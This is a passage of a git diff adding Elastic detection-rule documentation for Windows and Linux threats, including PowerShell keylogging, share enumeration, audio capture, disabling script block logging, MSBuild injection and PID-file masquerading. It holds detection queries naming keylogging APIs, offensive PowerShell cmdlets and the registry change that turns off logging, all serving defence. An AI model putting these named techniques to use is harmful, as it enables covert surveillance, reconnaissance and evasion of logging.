56f2e9b5-4803-4e44-a0a4-a52dc79d57fe + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Prioritize the response if this alert involves key executives or potentially valuable targets for espionage. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + ( + powershell.file.script_block_text : (GetAsyncKeyState or NtUserGetAsyncKeyState or GetKeyboardState or "Get-Keystrokes") or + powershell.file.script_block_text : ( + (SetWindowsHookA or SetWindowsHookW or SetWindowsHookEx or SetWindowsHookExA or NtUserSetWindowsHookEx) and + (GetForegroundWindow or GetWindowTextA or GetWindowTextW or "WM_KEYBOARD_LL" or "WH_MOUSE_LL") + ) + ) and not user.id : "S-1-5-18" + and not powershell.file.script_block_text : ( + "sentinelbreakpoints" and "Set-PSBreakpoint" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Input Capture +** ID: T1056 +** Reference URL: https://attack.mitre.org/techniques/T1056/ +* Sub-technique: +** Name: Keylogging +** ID: T1056.001 +** Reference URL: https://attack.mitre.org/techniques/T1056/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-script-block-logging-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-script-block-logging-disabled.asciidoc new file mode 100644 index 0000000000..d8c14b35a1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-script-block-logging-disabled.asciidoc @@ -0,0 +1,125 @@ +[[prebuilt-rule-8-10-5-powershell-script-block-logging-disabled]] +=== PowerShell Script Block Logging Disabled + +Identifies attempts to disable PowerShell Script Block Logging via registry modification. Attackers may disable this logging to conceal their activities in the host and evade detection. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating PowerShell Script Block Logging Disabled + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available in various environments and creating an attractive way for attackers to execute code. + +PowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it processes, giving defenders visibility of PowerShell scripts and sequences of executed commands. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Check whether it makes sense for the user to use PowerShell to complete tasks. +- Investigate if PowerShell scripts were run after logging was disabled. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Related rules + +- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e +- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889 +- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43 +- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d +- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad +- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a +- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type == "change" and + registry.path : ( + "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging" + ) and registry.data.strings : ("0", "0x00000000") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable Windows Event Logging +** ID: T1562.002 +** Reference URL: https://attack.mitre.org/techniques/T1562/002/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-share-enumeration-script.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-share-enumeration-script.asciidoc new file mode 100644 index 0000000000..acf81ec86b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-share-enumeration-script.asciidoc @@ -0,0 +1,141 @@ +[[prebuilt-rule-8-10-5-powershell-share-enumeration-script]] +=== PowerShell Share Enumeration Script + +Detects scripts that contain PowerShell functions, structures, or Windows API functions related to windows share enumeration activities. Attackers, mainly ransomware groups, commonly identify and inspect network shares, looking for critical information for encryption and/or exfiltration. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.advintel.io/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations +* https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/ +* https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Discovery +* Tactic: Collection +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating PowerShell Share Enumeration Script + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can use PowerShell to enumerate shares to search for sensitive data like documents, scripts, and other kinds of valuable data for encryption, exfiltration, and lateral movement. + +#### Possible investigation steps + +- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Check for additional PowerShell and command line logs that indicate that imported functions were run. + - Evaluate which information was potentially mapped and accessed by the attacker. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + powershell.file.script_block_text:( + "Invoke-ShareFinder" or + "Invoke-ShareFinderThreaded" or + ( + "shi1_netname" and + "shi1_remark" + ) or + ( + "NetShareEnum" and + "NetApiBufferFree" + ) + ) and not user.id : "S-1-5-18" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Share Discovery +** ID: T1135 +** Reference URL: https://attack.mitre.org/techniques/T1135/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Network Shared Drive +** ID: T1039 +** Reference URL: https://attack.mitre.org/techniques/T1039/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions.asciidoc new file mode 100644 index 0000000000..b2939b5941 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions.asciidoc @@ -0,0 +1,177 @@ +[[prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions]] +=== PowerShell Suspicious Discovery Related Windows API Functions + +This rule detects the use of discovery-related Windows API functions in PowerShell Scripts. Attackers can use these functions to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/BC-SECURITY/Empire/blob/9259e5106986847d2bb770c4289c0c0f1adf2344/data/module_source/situational_awareness/network/powerview.ps1#L21413 +* https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Discovery +* Tactic: Collection +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 110 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating PowerShell Suspicious Discovery Related Windows API Functions + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can use PowerShell to interact with the Win32 API to bypass command line based detections, using libraries like PSReflect or Get-ProcAddress Cmdlet. + +#### Possible investigation steps + +- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine file or network events from the involved PowerShell process for suspicious behavior. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Check for additional PowerShell and command-line logs that indicate that imported functions were run. + +### False positive analysis + +- Discovery activities themselves are not inherently malicious if occurring in isolation, as long as the script does not contain other capabilities, and there are no other alerts related to the user or host; such alerts can be dismissed. However, analysts should keep in mind that this is not a common way of getting information, making it suspicious. + +### Related rules + +- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + powershell.file.script_block_text : ( + NetShareEnum or + NetWkstaUserEnum or + NetSessionEnum or + NetLocalGroupEnum or + NetLocalGroupGetMembers or + DsGetSiteName or + DsEnumerateDomainTrusts or + WTSEnumerateSessionsEx or + WTSQuerySessionInformation or + LsaGetLogonSessionData or + QueryServiceObjectSecurity or + GetComputerNameEx or + NetWkstaGetInfo or + GetUserNameEx or + NetUserEnum or + NetUserGetInfo or + NetGroupEnum or + NetGroupGetInfo or + NetGroupGetUsers or + NetWkstaTransportEnum or + NetServerGetInfo or + LsaEnumerateTrustedDomains or + NetScheduleJobEnum or + NetUserModalsGet + ) + and not user.id : ("S-1-5-18" or "S-1-5-19") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Permission Groups Discovery +** ID: T1069 +** Reference URL: https://attack.mitre.org/techniques/T1069/ +* Sub-technique: +** Name: Local Groups +** ID: T1069.001 +** Reference URL: https://attack.mitre.org/techniques/T1069/001/ +* Technique: +** Name: Account Discovery +** ID: T1087 +** Reference URL: https://attack.mitre.org/techniques/T1087/ +* Sub-technique: +** Name: Local Account +** ID: T1087.001 +** Reference URL: https://attack.mitre.org/techniques/T1087/001/ +* Technique: +** Name: Domain Trust Discovery +** ID: T1482 +** Reference URL: https://attack.mitre.org/techniques/T1482/ +* Technique: +** Name: Network Share Discovery +** ID: T1135 +** Reference URL: https://attack.mitre.org/techniques/T1135/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Network Shared Drive +** ID: T1039 +** Reference URL: https://attack.mitre.org/techniques/T1039/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities.asciidoc new file mode 100644 index 0000000000..40a48b8682 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities.asciidoc @@ -0,0 +1,133 @@ +[[prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities]] +=== PowerShell Suspicious Script with Audio Capture Capabilities + +Detects PowerShell scripts that can record audio, a common feature in popular post-exploitation tooling. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-MicrophoneAudio.ps1 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Collection +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating PowerShell Suspicious Script with Audio Capture Capabilities + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can use PowerShell to interact with the Windows API with the intent of capturing audio from input devices connected to the victim's computer. + +#### Possible investigation steps + +- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine file or network events from the involved PowerShell process for suspicious behavior. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Investigate if the script stores the recorded data locally and determine if anything was recorded. +- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server. +- Assess network data to determine if the host communicated with the exfiltration server. + +### False positive analysis + +- Regular users should not need scripts to capture audio, which makes false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added. + +### Related rules + +- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe +- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Prioritize the response if this alert involves key executives or potentially valuable targets for espionage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + powershell.file.script_block_text : ( + "Get-MicrophoneAudio" or + "WindowsAudioDevice-Powershell-Cmdlet" or + (waveInGetNumDevs and mciSendStringA) + ) + and not powershell.file.script_block_text : ( + "sentinelbreakpoints" and "Set-PSBreakpoint" and "PowerSploitIndicators" + ) + and not user.id : "S-1-5-18" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Audio Capture +** ID: T1123 +** Reference URL: https://attack.mitre.org/techniques/T1123/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-injection-by-the-microsoft-build-engine.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-injection-by-the-microsoft-build-engine.asciidoc new file mode 100644 index 0000000000..72f480d007 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-injection-by-the-microsoft-build-engine.asciidoc @@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-process-injection-by-the-microsoft-build-engine]] +=== Process Injection by the Microsoft Build Engine + +An instance of MSBuild, the Microsoft Build Engine, created a thread in another process. This technique is sometimes used to evade detection or elevate privileges. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: None ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Data Source: Sysmon Only + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process.name:MSBuild.exe and host.os.type:windows and event.action:"CreateRemoteThread detected (rule: CreateRemoteThread)" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-started-from-process-id-pid-file.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-started-from-process-id-pid-file.asciidoc new file mode 100644 index 0000000000..873fede2f5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-started-from-process-id-pid-file.asciidoc @@ -0,0 +1,84 @@ +[[prebuilt-rule-8-10-5-process-started-from-process-id-pid-file]] +=== Process Started from Process ID (PID) File + +Identifies a new process starting from a process ID (PID), lock or reboot file within the temporary file storage paradigm (tmpfs) directory /var/run directory. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.sandflysecurity.com/blog/linux-file-masquerading-and-malicious-pids-sandfly-1-2-6-update/ +* https://twitter.com/GossiTheDog/status/1522964028284411907 +* https://exatrack.com/public/Tricephalic_Hellkeeper.pdf +* https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Threat: BPFDoor +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Process Started from Process ID (PID) File +Detection alerts from this rule indicate a process spawned from an executable masqueraded as a legitimate PID file which is very unusual and should not occur. Here are some possible avenues of investigation: +- Examine parent and child process relationships of the new process to determine if other processes are running. +- Examine the /var/run directory using Osquery to determine other potential PID files with unsually large file sizes, indicative of it being an executable: "SELECT f.size, f.uid, f.type, f.path from file f WHERE path like '/var/run/%%';" +- Examine the reputation of the SHA256 hash from the PID file in a database like VirusTotal to identify additional pivots and artifacts for investigation. + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and user.id == "0" and + process.executable regex~ """/var/run/\w+\.(pid|lock|reboot)""" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-termination-followed-by-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-termination-followed-by-deletion.asciidoc new file mode 100644 index 0000000000..6f5e00d6f4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-process-termination-followed-by-deletion.asciidoc @@ -0,0 +1,141 @@ +[[prebuilt-rule-8-10-5-process-termination-followed-by-deletion]] +=== Process Termination followed by Deletion + +Identifies a process termination event quickly followed by the deletion of its executable file. Malware tools and other non-native files dropped or created on a system by an adversary may leave traces to indicate to what occurred. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Process Termination followed by Deletion + +This rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = 